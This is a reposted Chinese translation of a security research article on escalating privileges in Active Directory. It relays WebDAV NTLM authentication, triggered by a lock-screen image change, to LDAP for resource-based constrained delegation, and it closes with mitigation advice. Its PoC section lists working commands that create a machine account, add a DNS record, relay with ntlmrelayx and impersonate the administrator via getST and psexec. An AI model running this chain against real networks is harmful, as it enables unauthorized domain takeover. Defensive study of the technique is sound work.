本篇文章為大家展示了如何在滿補丁的Win10域主機上繞過圖形接口依賴實現本地提權，內容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細介紹希望你能有所收獲。

站在用戶的角度思考問題，與客戶深入溝通，找到臨清網站設計與臨清網站推廣的解決方案，憑借多年的經驗，讓設計與互聯網技術結合，創造個性化、用戶體驗好的作品，建站類型包括：成都做網站、網站建設、企業官網、英文網站、手機端網站、網站推廣、域名注冊、雅安服務器托管、企業郵箱。業務覆蓋臨清地區。

Objective

小編的目的是向大家展示，如何在打滿補丁的Win10域主機上繞過圖形接口依賴實現本地提權。你可能已經注意到了[1]，這種攻擊并不新鮮，但我們已經刪除了它的一些依賴項，同時我們也已自動化了該過程，以簡化我們的操作過程。

攻擊條件

截至本文撰寫，攻擊者仍需滿足以下條件，才能使用此技術妥協Active Directory計算機對象：

具有至少一個ServicePrincipalName (SPN)的帳戶。此帳戶將被配置為受害者系統上的“允許代表其他身份（Allowed To Act On Behalf Of Other Identity）”，并將用于調用S4U2self和S4U2proxy協議。

必須在受害計算機上安裝WebDAV Redirector功能。這是因為WebDAV客戶端不協商簽名，因此允許身份驗證中繼到LDAP。

SMB中繼可以使用最近發現的signing/MIC NTLM繞過來實現，但這已被微軟修復了。[6] [7]

指向攻擊者計算機的DNS記錄。WebDAV客戶端將僅自動向Intranet區域中的主機進行身份驗證。這意味著使用IP而非主機名是行不通的。

訪問GUI以使用“Create your picture --> Browse for one”功能。其中一個步驟是由System（因此，計算機帳戶在網絡中）完成的，并且可以指定WebDAV路徑（\\maliciousWebDav@80\pics\pic.jpg）

以下信息對嘗試滿足上述依賴非常有用：

1. 默認的Active Directory ms-DS-MachineAccountQuota屬性，允許所有域用戶向域中添加最多10個計算機帳戶[4]。另外，計算機帳戶具有其SPN屬性的值，因此允許使用S4U協議。

2. 在Windows 10上，默認情況下已安裝WebDAV客戶端。在Windows Server 2012R2及更早版本中，需要桌面體驗功能（Desktop Experience feature ）。 在Windows Server 2016及更高版本上，必須手動安裝WebDAV Redirector 功能。

3. 默認情況下，經過身份驗證的用戶在Active Directory集成DNS（ADIDNS）區域中，具有“創建所有子對象”ACL。這樣可以創建新的DNS記錄。

前三個條件很容易滿足，因為它們代表了默認的Active Directory和Windows配置。但是，GUI的依賴在我們的場景中著實是一個令人感到沮喪的限制。

通過命令行更改圖像

作為第一種方法，我們研究了使用API或Windows命令實用程序來更改配置文件圖像 - 但并沒有成功。然而，我們發現了通過對鎖屏圖像的操作可以暴露出相同的攻擊路徑。

以下截圖說明了這一點。

注意：在發表這篇文章前幾天，Elad Shamir發表文章稱他還發現了這個鎖屏圖像攻擊路徑。有關他的研究可以在[12]中找到。

在研究鎖屏圖像功能時，我們發現在本例中，可以使用API來執行鎖屏圖像更改[3]。使用這個API，我們最終通過命令行實現了SYSTEM網絡身份驗證。

編寫PowerShell腳本和C#程序集以利用此API。我們調用了實用程序Change-Lockscreen，它可以在以下鏈接中找到：

https://github.com/nccgroup/Change-Lockscreen

使用此工具，指示提供圖像的WebDAV的路徑，Change-Lockscreen將執行導致所需網絡身份驗證的操作。

請注意，默認情況下，Windows 10具有一個名為Windows Spotlight的功能。此功能會自動下載并顯示鎖屏圖像。啟用此功能后，Change-Lockscreen將禁用它，并建立參數中指定的圖像（嘗試使用opsec）。但是，如果用戶設置了一個靜態的、自定義的鎖屏圖像而不是使用Spotlight，則Change-Lockscreen將備份該圖像，并在攻擊完成后將其放回原位。

演示視頻：

在Impacket中實施攻擊

最初，我們使用3xocyte（與Elad Shamir合作）開發的rbcd_relay.py委托中繼工具[5]。雖然這在我們的一些測試場景中非常有用，但它并沒有涵蓋我們所需的一切。因此，我們決定通過執行pull請求，在3xcely的工作和SecureAuth的Impacket項目[13]中添加我們自己的內容。

我們向ntlmrelayx添加了一個名為--serve-image的新標志。使用此標志，ntlmrelayx將提供指定的圖像以滿足攻擊的目的。

此外，為了利用WebDAV的服務器功能，有必要在httprelayserver.py中實現OPTIONS和PROPFIND方法。OPTIONS方法用于通知客戶端支持并啟用PROPFIND方法。它是PROPFIND請求，其中包括NTLM身份驗證，因此這個請求將被中繼以執行攻擊（示例請求如下圖所示）。

示例用法如下：

ntlmrelayx.py -t ldap://dc01.capsule.corp --delegate-access --escalate-user machine$ --serve-image ./spot.jpg

這些功能已經在Impacket中合并，你可以在以下位置找到：

https://github.com/SecureAuthCorp/impacket

PoC

以下是有關使用Change-Lockscreen和ntlmrelayx攻擊的視頻演示：

以下步驟對應于上述視頻內容：

1. 我們需要一個具有ServicePrincipalName屬性值的帳戶，才能調用S4U2Self和S4U2Proxy。我們可以濫用默認的Active Directory ms-DS-MachineAccountQuota屬性，將計算機帳戶添加到域中并使用它（Powermad [11]）。

$pass = ConvertTo-SecureString ‘NCC1234!’ -AsPlainText -Force ; New-MachineAccount –MachineAccount s4umachine -Password $pass

2. 我們必須創建一個指向攻擊者機器（攻擊者IP）的DNS記錄（ImageServer.capsule.corp）。

$cred = New-Object System.Management.Automation.PSCredential (“CAPSULE\s4umachine”, $pass); Invoke-DNSUpdate -DNSType A -DNSName ImageServer.capsule.corp -DNSData 10.10.11.137 -Credential $cred -Realm capsule.corp

3. 我們通過使用low-priv用戶來更改鎖屏圖像來觸發Fileserver的網絡身份驗證。

Change-Lockscreen –Webdav \\imageserver@80\

4. 使用ntlmrelayx，身份驗證將中繼到LDAP。這允許我們修改機器的msDS-AllowedToActOnBehalfOfOtherIdentity屬性。

Ntlmrelayx.py -t ldap://dc01.capsule.corp --delegate-access --escalate-user s4umachine$ --serve-image ./spot.jpg

5. 現在，我們可以使用受信任的計算機（S4UMachine$）模擬文件服務器上任意服務的任意用戶。

getST.py capsule\s4umachine:’NCC1234!’@fileserver.capsule.corp -spn cifs/fileserver.capsule.corp -impersonate administrator -dc-ip 10.10.11.128
Export KRB5CCNAME=administrator.ccache
Psexec.py -k -no-pass fileserver.capsule.corp

以下短視頻以圖形、概念化的方式向大家展示了攻擊中涉及的各個步驟。

緩解和檢測 

以下幾點有助于緩解和檢測此類攻擊：

由于此攻擊依賴于能夠為自身配置基于Kerberos資源的約束委派的計算機，因此拒絕自己寫入msDS-AllowedToActOnBehalfOfOtherIdentity屬性的計算機上的新ACE，將有助于緩解此攻擊面。

對msDS-AllowedToActOnBehalfOfOtherIdentity屬性，實施適當的SACL將有助于檢測對此功能的修改。

最后，通過channel綁定啟用LDAP簽名，可以緩解使用此攻擊執行的身份驗證中繼。

上述內容就是如何在滿補丁的Win10域主機上繞過圖形接口依賴實現本地提權，你們學到知識或技能了嗎？如果還想學到更多技能或者豐富自己的知識儲備，歡迎關注創新互聯行業資訊頻道。

本文名稱：如何在滿補丁的Win10域主機上繞過圖形接口依賴實現本地提權
URL地址：http://vcdvsql.cn/article34/pehose.html

成都網站建設公司_創新互聯，為您提供、小程序開發、外貿建站、ChatGPT、虛擬主機、用戶體驗

廣告

聲明：本網站發布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創新互聯